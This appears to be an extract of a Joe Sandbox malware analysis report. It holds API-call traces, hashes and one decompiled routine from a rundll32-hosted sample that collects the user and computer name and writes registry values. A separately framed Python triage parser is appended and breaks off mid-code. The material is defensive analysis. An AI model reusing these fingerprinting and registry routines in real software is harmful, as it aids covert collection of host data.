                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                          • String ID:
                                                          • API String ID: 2734445380-0
                                                          • Opcode ID: 37e6b22cd06e8e66a0412aa5d2cccdceaa31be112e6363379f9bb1c5ea9f3c10
                                                          • Instruction ID: b0daa4075c12a6eefb240ce57008fccec881dca80a9303907b760ccffd6f3a42
                                                          • Opcode Fuzzy Hash: 37e6b22cd06e8e66a0412aa5d2cccdceaa31be112e6363379f9bb1c5ea9f3c10
                                                          • Instruction Fuzzy Hash: 32314872910209AFCB11DF99DC89EEE7BB9EF85320F008514FE19A2200E7759A55DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,06273DA2,00000000,00000001,?,?,?), ref: 0627DD92
                                                          • lstrlen.KERNEL32(?), ref: 0627DDA2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627DDD6
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0627DE01
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0627DE20
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627DE81
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0627DEA3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                          • String ID:
                                                          • API String ID: 3204852930-0
                                                          • Opcode ID: 062068f952ffa9b52f02c67a21e822200780c6c421626dfe675db36460f31225
                                                          • Instruction ID: 94ea765ac372ee6904c716fec7f62fcb498a72df170ad974d4d82a73eb7dbae4
                                                          • Opcode Fuzzy Hash: 062068f952ffa9b52f02c67a21e822200780c6c421626dfe675db36460f31225
                                                          • Instruction Fuzzy Hash: 24311B72D1020EAFDF529F65CC84DAEBBB9EF58244F044869ED14A7211E731DA54CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062870C3: RtlEnterCriticalSection.NTDLL(0629A428), ref: 062870CB
                                                            • Part of subcall function 062870C3: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062870E0
                                                            • Part of subcall function 062870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 062870F9
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 06281F04
                                                          • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,06288667,?,00000000), ref: 06281F15
                                                          • lstrcmpi.KERNEL32(00000002,?), ref: 06281F5B
                                                          • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,06288667,?,00000000), ref: 06281F6F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,06288667,?,00000000), ref: 06281FB5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 733514052-0
                                                          • Opcode ID: 1461ad55ac6a64f44fb9dcd60d48c96b08a195a3d4ed8a7fcdaecf2b83fb877d
                                                          • Instruction ID: 4514807d797fad02b2b19af4be758f622adc590d3e9c9f18b6d836566d92d832
                                                          • Opcode Fuzzy Hash: 1461ad55ac6a64f44fb9dcd60d48c96b08a195a3d4ed8a7fcdaecf2b83fb877d
                                                          • Instruction Fuzzy Hash: 9C31D471A1030AAFDB50AFA8EC88A9E7BB9FF54254F104024FD04A7280D3348D55CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                           C-Code - Quality: 100%
                                                           			E036D2A11() {
                                                           				long _v8;
                                                           				long _v12;
                                                           				int _v16;
                                                           				long _t39;
                                                           				long _t43;
                                                           				signed int _t47;
                                                           				short _t51;
                                                           				signed int _t52;
                                                           				int _t56;
                                                           				int _t57;
                                                           				char* _t64;
                                                           				short* _t67;
                                                           
                                                           				_v16 = 0;
                                                           				_v8 = 0;
                                                           				GetUserNameW(0,  &_v8); // size probe with a NULL buffer: _v8 receives the user name length incl. NUL
                                                           				_t39 = _v8;
                                                           				if(_t39 != 0) {
                                                           					_v12 = _t39;
                                                           					_v8 = 0;
                                                           					GetComputerNameW(0,  &_v8); // second probe: computer name length incl. NUL
                                                           					_t43 = _v8;
                                                           					if(_t43 != 0) {
                                                           						_t11 = _t43 + 2; // 0x75bcc742
                                                           						_v12 = _v12 + _t11;
                                                           						_t64 = E036D6D63(_v12 + _t11 << 2); // heap allocation (RtlAllocateHeap, see the subcall in the API list below)
                                                           						if(_t64 != 0) {
                                                           							_t47 = _v12;
                                                           							_t67 = _t64 + _t47 * 2; // wide-char staging area placed past the first _v12 bytes of the same allocation
                                                           							_v8 = _t47;
                                                           							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                           								L7:
                                                           								E036D6C2C(_t64); // free the buffer; the function then returns 0
                                                           							} else {
                                                           								_t51 = 0x40; // '@'
                                                           								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51; // GetUserNameW counts the NUL; overwrite it with '@'
                                                           								_t52 = _v8;
                                                           								_v12 = _v12 - _t52;
                                                           								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) { // append the computer name directly after '@'
                                                           									goto L7;
                                                           								} else {
                                                           									_t56 = _v12 + _v8; // total wide chars: computer name + user name + '@'
                                                           									_t31 = _t56 + 2; // 0x36d57e9
                                                           									_v12 = _t56;
                                                           									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0); // 0xFDE9 = CP_UTF8: encode L"user@computer" into the start of the allocation
                                                           									_v8 = _t57;
                                                           									if(_t57 == 0) {
                                                           										goto L7;
                                                           									} else {
                                                           										_t64[_t57] = 0; // NUL-terminate; result is the UTF-8 "user@computer" string
                                                           										_v16 = _t64;
                                                           									}
                                                           								}
                                                           							}
                                                           						}
                                                           					}
                                                           				}
                                                           				return _v16;
                                                           			}
                                                           Instruction addresses for the listing above: 0x036d2a1f - 0x036d2ae3 (one address per decompiled statement; the address column was separated from the code by extraction).

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,036D57E7), ref: 036D2A25
                                                          • GetComputerNameW.KERNEL32(00000000,036D57E7), ref: 036D2A41
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetUserNameW.ADVAPI32(00000000,036D57E7), ref: 036D2A7B
                                                          • GetComputerNameW.KERNEL32(036D57E7,75BCC740), ref: 036D2A9E
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,036D57E7,00000000,036D57E9,00000000,00000000,?,75BCC740,036D57E7), ref: 036D2AC1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 1c63a9c10bafb6b447123e1b2bddd26c86deb831d06e09628136acdb79756529
                                                          • Instruction ID: 95b763c0ebed9c2e0ffbc3b979c5e9c083cc6b03de4efe86e70971c3f72f38ef
                                                          • Opcode Fuzzy Hash: 1c63a9c10bafb6b447123e1b2bddd26c86deb831d06e09628136acdb79756529
                                                          • Instruction Fuzzy Hash: 2521D676D00208FFCB21DFE9DA849AEBBB8FF44200B5444AAE901E7244E7709B45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0627243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0628D58C
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 06272454
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 06272467
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 06272478
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 062724E3
                                                          • InterlockedIncrement.KERNEL32(0629A43C), ref: 062724FA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 3915436794-0
                                                          • Opcode ID: 8e65d5f51bc75022530238e3c7a18de895ed12d82c00d7f0e26bef6bd017ed84
                                                          • Instruction ID: 9b607d155c6d47f9280f31dff01ae7647150adc246e012fc4e31a0e40262fd47
                                                          • Opcode Fuzzy Hash: 8e65d5f51bc75022530238e3c7a18de895ed12d82c00d7f0e26bef6bd017ed84
                                                          • Instruction Fuzzy Hash: 0331BF31A22302DFC765CF28E858E2AB7E5FB88325B004919FD5983250DB34DA15CFE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0628833B
                                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 06288357
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 06288391
                                                          • GetComputerNameW.KERNEL32(?,?), ref: 062883B4
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 062883D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 4afb381c433e092e699d2983a1b776e91806830a45de380d640ebb1c27de14e3
                                                          • Instruction ID: d63135b8d3115ae10188a5a564c0a592310489684fd322f4f2d52bd95590a759
                                                          • Opcode Fuzzy Hash: 4afb381c433e092e699d2983a1b776e91806830a45de380d640ebb1c27de14e3
                                                          • Instruction Fuzzy Hash: B321FB76D11209FFDB11DFE8D9888EEBBBDEF48200B5044AAE601E7240D6349B45CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 06273090
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 06273099
                                                          • GetLastError.KERNEL32 ref: 062730A3
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06273162
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3543646443-0
                                                          • Opcode ID: 25dc25c0cc1d1ac6783e44612ce2f3b6b7dd9526dfe280dc25081ee668a7f341
                                                          • Instruction ID: 8f31deb780e551cead8f30f82b7c5ccd35faae6ea1d86492990ed405685acc68
                                                          • Opcode Fuzzy Hash: 25dc25c0cc1d1ac6783e44612ce2f3b6b7dd9526dfe280dc25081ee668a7f341
                                                          • Instruction Fuzzy Hash: 1621FFB2612310AFC790BBA9FC5CE8A379DAF8A211B040411FB15DB281D638E514CFF9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06281C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06281C25
                                                            • Part of subcall function 06281C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 06281C3B
                                                            • Part of subcall function 06281C19: _snwprintf.NTDLL ref: 06281C60
                                                            • Part of subcall function 06281C19: CreateFileMappingW.KERNEL32(000000FF,0629A1E8,00000004,00000000,00001000,?), ref: 06281C7C
                                                            • Part of subcall function 06281C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 06281C8E
                                                            • Part of subcall function 06281C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 06281CC6
                                                          • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06282F89
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06282F92
                                                          • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06282FD9
                                                          • GetLastError.KERNEL32(06283959,00000000,00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06283008
                                                          • CloseHandle.KERNEL32(00000000,06283959,00000000,00000000,?,?,?,?,?,?,?,06279100,?), ref: 06283018
                                                            • Part of subcall function 0627C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0627171E,?,?,00000000,?), ref: 0627C2B6
                                                            • Part of subcall function 0627C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0627171E,?,?,00000000,?), ref: 0627C2DE
                                                            • Part of subcall function 0627C2AA: memset.NTDLL ref: 0627C2F0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1106445334-0
                                                          • Opcode ID: b9681def0ca6d0fd96163dd1fd355421d0ff033f221503a628d77b4384449bfb
                                                          • Instruction ID: 4a5317b8e5f481a805cf49eb398e1947950565b4d9e5fd50c6ddc8cbf7b08c46
                                                          • Opcode Fuzzy Hash: b9681def0ca6d0fd96163dd1fd355421d0ff033f221503a628d77b4384449bfb
                                                          • Instruction Fuzzy Hash: 8C21C931A26306EFDB91BFB5EC08B5A77AAEF54750B040528EE11D3190DB31E941DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0627148A,?,?,?), ref: 0628A66F
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,0627148A,?,?,?), ref: 0628A67F
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0627148A,?,?,?), ref: 0628A6AB
                                                          • GetLastError.KERNEL32(?,?,0627148A,?,?,?), ref: 0628A6D0
                                                          • CloseHandle.KERNEL32(000000FF,?,?,0627148A,?,?,?), ref: 0628A6E1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                                          • String ID:
                                                          • API String ID: 3577853679-0
                                                          • Opcode ID: 92c7b5573eb24d80e4a8ab4be420bd4e18a6f9c66c9c38a6c6cc2c663143e534
                                                          • Instruction ID: 7899e9865ac741cbaf40784ca4ea3df5ec24bae84f89b396e2b54b84efdea8c1
                                                          • Opcode Fuzzy Hash: 92c7b5573eb24d80e4a8ab4be420bd4e18a6f9c66c9c38a6c6cc2c663143e534
                                                          • Instruction Fuzzy Hash: 92112432611226AFDF612F6DDC8CAAE7B69EB442A4F010126FD15A71C0DA71AC40DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?), ref: 062775E9
                                                          • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?), ref: 06277602
                                                          • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 0627762A
                                                          • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 06277639
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?), ref: 06277670
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Trim$FreeHeap
                                                          • String ID:
                                                          • API String ID: 2132463267-0
                                                          • Opcode ID: 7dea62e7b9d2466fe5f487180da2929aa9fdf33bf9aed577d08657171787dbc8
                                                          • Instruction ID: 5f219e481b984180c82654833da5da214d6551d6ab3818ec42515e68eba085d8
                                                          • Opcode Fuzzy Hash: 7dea62e7b9d2466fe5f487180da2929aa9fdf33bf9aed577d08657171787dbc8
                                                          • Instruction Fuzzy Hash: 3A119032610707BFD7119A6DEC89F9B7BADDB88694F040021BE09DB285EA70D9018BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,005FD5A8,?,?,00000000,00000000,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C), ref: 062838D4
                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 06283904
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 06283913
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06283931
                                                          • GetLastError.KERNEL32(?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 06283941
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: 146c26975d0a2c69ec3a3e98d2921b94d367006fc6c50582d2cb3c1348a7cf75
                                                          • Instruction ID: e2b8b80ba4e37babc0e890d75d5c3fd9d2e896a0fc55642444b63208083c124d
                                                          • Opcode Fuzzy Hash: 146c26975d0a2c69ec3a3e98d2921b94d367006fc6c50582d2cb3c1348a7cf75
                                                          • Instruction Fuzzy Hash: 682138B5610B02EFD751DFA8D984A4ABBF8FF08714B008629EA5AD3750D770E944CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0629A06C), ref: 06283785
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 062837DC
                                                          • InterlockedDecrement.KERNEL32(0629A06C), ref: 062837F1
                                                          • DeleteFileA.KERNEL32(00000000), ref: 0628380F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628381D
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                            • Part of subcall function 0627A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0627A391
                                                            • Part of subcall function 0627A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0627A3BD
                                                            • Part of subcall function 0627A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0627A3CD
                                                            • Part of subcall function 0627A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0627A405
                                                            • Part of subcall function 0627A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0627A427
                                                            • Part of subcall function 0627A316: GetShellWindow.USER32 ref: 0627A436
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                                                          • String ID:
                                                          • API String ID: 1587453479-0
                                                          • Opcode ID: 2f3a03e2de3c56f34dac58d431f8f70aa220a9f7cd157de1f20c175c3bed942e
                                                          • Instruction ID: fcf43b2d35d38cfb97b0f4cf245c0c5a34bf6539163bad984d3bb6bc4dc50028
                                                          • Opcode Fuzzy Hash: 2f3a03e2de3c56f34dac58d431f8f70aa220a9f7cd157de1f20c175c3bed942e
                                                          • Instruction Fuzzy Hash: C2119375620309FFDB42AFA4DC85EAE3E7DEB88794F104025FE05AA140D7B5C980DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 06287436
                                                          • GetLastError.KERNEL32 ref: 06287459
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0628746C
                                                          • GetLastError.KERNEL32 ref: 06287477
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 062874BF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1671499436-0
                                                          • Opcode ID: bd15c0aae348d7066fbc804767c087409504556f2a33bac7dbeaf13e43028ac6
                                                          • Instruction ID: 8100b0434af140d67a241b193aceaf9f25a6888e7eade9a4b6b407f9eea0582a
                                                          • Opcode Fuzzy Hash: bd15c0aae348d7066fbc804767c087409504556f2a33bac7dbeaf13e43028ac6
                                                          • Instruction Fuzzy Hash: E121C230A20305AFEB61AF50ED8DF5D7FBAEBC1318F300414EA42950E0D7749984DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062726E7
                                                          • memcpy.NTDLL(00000000,?,?,?), ref: 06272710
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 06272739
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 06272759
                                                          • RegCloseKey.ADVAPI32(?), ref: 06272764
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2954810647-0
                                                          • Opcode ID: 68f71b66f187e1c9034e3e7d91200579cd7c09c9a02c8cccb39afc6f85489127
                                                          • Instruction ID: f1984154f5f68db942d8d88c97f432cd76b2a4ba92f2270d1a37e2393225a4c7
                                                          • Opcode Fuzzy Hash: 68f71b66f187e1c9034e3e7d91200579cd7c09c9a02c8cccb39afc6f85489127
                                                          • Instruction Fuzzy Hash: D811CA32910205FFDF516E54ED88EAE777DEF44351F044025FE01A6190D6718D50DB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
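As an added example, not part of this Joe Sandbox report and not code from the analysed sample, the Python below parses "APIs" listings of the form shown above (the GetUserNameW/GetComputerNameW/WideCharToMultiByte function and the RegCreateKeyA/RegSetValueExA function), decodes the constant arguments the sandbox captured (80000001 is HKEY_CURRENT_USER, a RegSetValueExA dwType of 00000003 is REG_BINARY, code page 0000FDE9 is 65001, CP_UTF8) and tags each function with a triage behaviour. The sample input is copied from the two listings above; the tag rules, the `direct_only` convention and every function name are this example's own assumptions, not Joe Sandbox signature logic.

```python
import re

# Constructed sample input: "APIs" bullet lines copied from this report for the
# host-fingerprint function and the registry-write function shown above.
SAMPLE_REPORT = """\
APIs
\u2022 GetUserNameW.ADVAPI32(00000000,?), ref: 0628833B
\u2022 GetComputerNameW.KERNEL32(00000000,?), ref: 06288357
  \u2022 Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
\u2022 GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 06288391
\u2022 GetComputerNameW.KERNEL32(?,?), ref: 062883B4
\u2022 WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 062883D7
Memory Dump Source
Uniqueness Score: -1.00%

APIs
\u2022 RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062726E7
\u2022 memcpy.NTDLL(00000000,?,?,?), ref: 06272710
\u2022 RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 06272739
\u2022 RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 06272759
\u2022 RegCloseKey.ADVAPI32(?), ref: 06272764
  \u2022 Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
Uniqueness Score: -1.00%
"""

# One bullet of an "APIs" listing. Some entries (e.g. "GetCurrentThreadId.KERNEL32 ref: ...")
# carry no argument list, so the parenthesised group is optional.
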